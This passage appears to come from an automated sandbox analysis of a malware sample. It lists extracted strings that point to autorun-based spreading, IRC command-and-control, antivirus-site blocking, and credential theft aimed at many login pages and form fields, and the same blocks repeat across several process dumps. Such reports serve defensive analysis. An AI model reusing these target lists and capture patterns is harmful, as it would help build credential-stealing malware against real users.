'%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 0000000A.00000002.620519404.0000000000180000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 0000000A.00000002.620519404.0000000000180000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exeBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exeBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exeBinary or memory string: autorun.inf
            Source: QgGhoOpxHPl.exe, 0000000B.00000002.620993011.0000000000380000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 0000000B.00000002.620993011.0000000000380000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 0000000B.00000002.620993011.0000000000380000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL '%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 0000000B.00000002.620993011.0000000000380000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 0000000B.00000002.620993011.0000000000380000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exeBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exeBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exeBinary or memory string: autorun.inf
            Source: QgGhoOpxHPl.exe, 0000000C.00000002.621009440.0000000000410000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 0000000C.00000002.621009440.0000000000410000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 0000000C.00000002.621009440.0000000000410000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL '%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 0000000C.00000002.621009440.0000000000410000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 0000000C.00000002.621009440.0000000000410000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exeBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exeBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exeBinary or memory string: autorun.inf
            Source: QgGhoOpxHPl.exe, 0000000D.00000002.620504117.00000000001B0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 0000000D.00000002.620504117.00000000001B0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 0000000D.00000002.620504117.00000000001B0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL '%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 0000000D.00000002.620504117.00000000001B0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 0000000D.00000002.620504117.00000000001B0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exeBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exeBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exeBinary or memory string: autorun.inf
            Source: QgGhoOpxHPl.exe, 0000000E.00000002.620850418.0000000000350000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 0000000E.00000002.620850418.0000000000350000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 0000000E.00000002.620850418.0000000000350000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL '%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 0000000E.00000002.620850418.0000000000350000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 0000000E.00000002.620850418.0000000000350000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exeBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exeBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exeBinary or memory string: autorun.inf
            Source: QgGhoOpxHPl.exe, 0000000F.00000002.620690942.0000000000310000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exe, 0000000F.00000002.620690942.0000000000310000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exe, 0000000F.00000002.620690942.0000000000310000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: NtFreeVirtualMemoryNtAllocateVirtualMemoryNtQuerySystemInformationLdrEnumerateLoadedModulesNtQueryInformationProcessLdrGetProcedureAddressNtQueryVirtualMemoryLdrLoadDllNtQueryInformationThreadLdrGetDllHandleRtlAnsiStringToUnicodeStringntdll.dll\\.\pipe\%skernel32.dllGetNativeSystemInfo%s_%d%s_0-%sMutexSeDebugPrivilegentdll.dllNtGetNextProcess%s-pid%s-commNtResumeThreadInternet Explorer\iexplore.exePONG JOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!.exeautorun.inf%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %255sJOIN %255sPRIVMSGJOINcnc%s:%dpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exeNtSetInformationProcess&%s.%s%s%S%s%sHKCU\HKLM\%s.%S%S%S%S%SHKCU\HKLM\msn%s_onstate_%soff%s.%s (p='%S')pop3://%s:%s@%s:%dpopgrab%s:%s@%s:%danonymousftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %sDirectadminWHCMSWHMcPanelblog%s-%s-%sffgrabiegrabMicrosoft Unified Security Protocol Provider%s.Blocked possible browser exploit pack call on URL '%s'scrpifcom%s.Blocked possible browser exploit pack call on URL '%S'webroot.fortinet.virusbuster.nprotect.gdatasoftware.virus.precisesecurity.lavasoft.heck.tcemsisoft.onlinemalwarescanner.onecare.live.f-secure.bullguard.clamav.pandasecurity.sophos.malwarebytes.sunbeltsoftware.norton.norman.mcafee.symanteccomodo.avast.avira.avg.bitdefender.eset.kaspersky.trendmicro.iseclab.virscan.garyshood.viruschief.jotti.threatexpert.novirusthanks.virustotal.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exelogin[password]login[username]*members*.iknowthatgirl*/members*IKnowThatGirl*youporn.*/login*YouPorn*members.brazzers.com*BrazzersclavenumeroTarjeta*clave=**bcointernacional*login*Bcointernacional*:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*Dotsterloginid*enom.com/login*Enomlogin.Passlogin.User*login.Pass=**1and1.com/xml/config*1and1token*moniker.com/*Login*MonikerLoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*Namecheaploginname*godaddy.com/login*GodaddyPasswordEmailName*Password=**alertpay.com/login*Alertpay*netflix.com/*ogin*Netflix*thepiratebay.org/login*Thepiratebay*torrentleech.org/*login*Torrentleech*vip-file.com/*/signin-do*Vip-filepaslog*pas=**sms4file.com/*/signin-do*Sms4file*letitbit.net*Letitbit*what.cd/login*Whatcd*oron.com/login*Oron*filesonic.com/*login*Filesonic*speedyshare.com/login*Speedysharepwid*pw=**uploaded.to/*login*Uploaded*uploading.com/*login*UploadingloginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login*Fileserve*hotfile.com/login*Hotfile*4shared.com/login*4sharedtxtpasstxtuser*txtpass=**netload.in/index*Netload*freakshare.com/login*Freaksharelogin_pass*login_pass=**mediafire.com/*login*Mediafire*sendspace.com/login*Sendspace*megaupload.*/*login*Mega
            Source: QgGhoOpxHPl.exe, 0000000F.00000002.620690942.0000000000310000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: shellexecute=[autorun]
            Source: QgGhoOpxHPl.exe, 0000000F.00000002.620690942.0000000000310000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .lnk%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %%cd%%%s/c "start %%cd%%RECYCLED\%sRECYCLED...inf%s%s*\\.\%c:%S%S\Desktop.ini%s\%s%S%sautorun.tmp%sautorun.inf:\%c:\gdkWindowToplevelClass%0x.execomment-text*bebo.*/c/home/ajax_post_lifestream_commentbebo Lifestream*bebo.*/c/profile/comment_post.jsonbebo CommentMessage*bebo.*/mail/MailCompose.jsp*bebo Message*friendster.*/sendmessage.php*Friendster MessagecommentFriendster Commentshoutout*friendster.*/rpc.phpFriendster Shoutout*vkontakte.ru/mail.phpvkontakte Message*vkontakte.ru/wall.phpvkontakte Wallmessage*vkontakte.ru/api.phpvkontakte Chattext*twitter.*/*direct_messages/new*Twitter Message*twitter.*/*status*/update*Twitter Tweetstatus*facebook.*/ajax/*MessageComposerEndpoint.php*Facebook Messagemsg_text*facebook.*/ajax/chat/send.php*Facebook IM-_.!~*'()+Content-Length: %s.%s hijacked!%s=MSG %d %s %d
            Source: QgGhoOpxHPl.exeBinary or memory string: %sautorun.inf
            Source: QgGhoOpxHPl.exeBinary or memory string: [autorun]
            Source: QgGhoOpxHPl.exeBinary or memory string: autorun.inf
            Source: QgGhoOpxHPl.exe, 00000010.00000002.621074931.0000000000380000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [autorun]
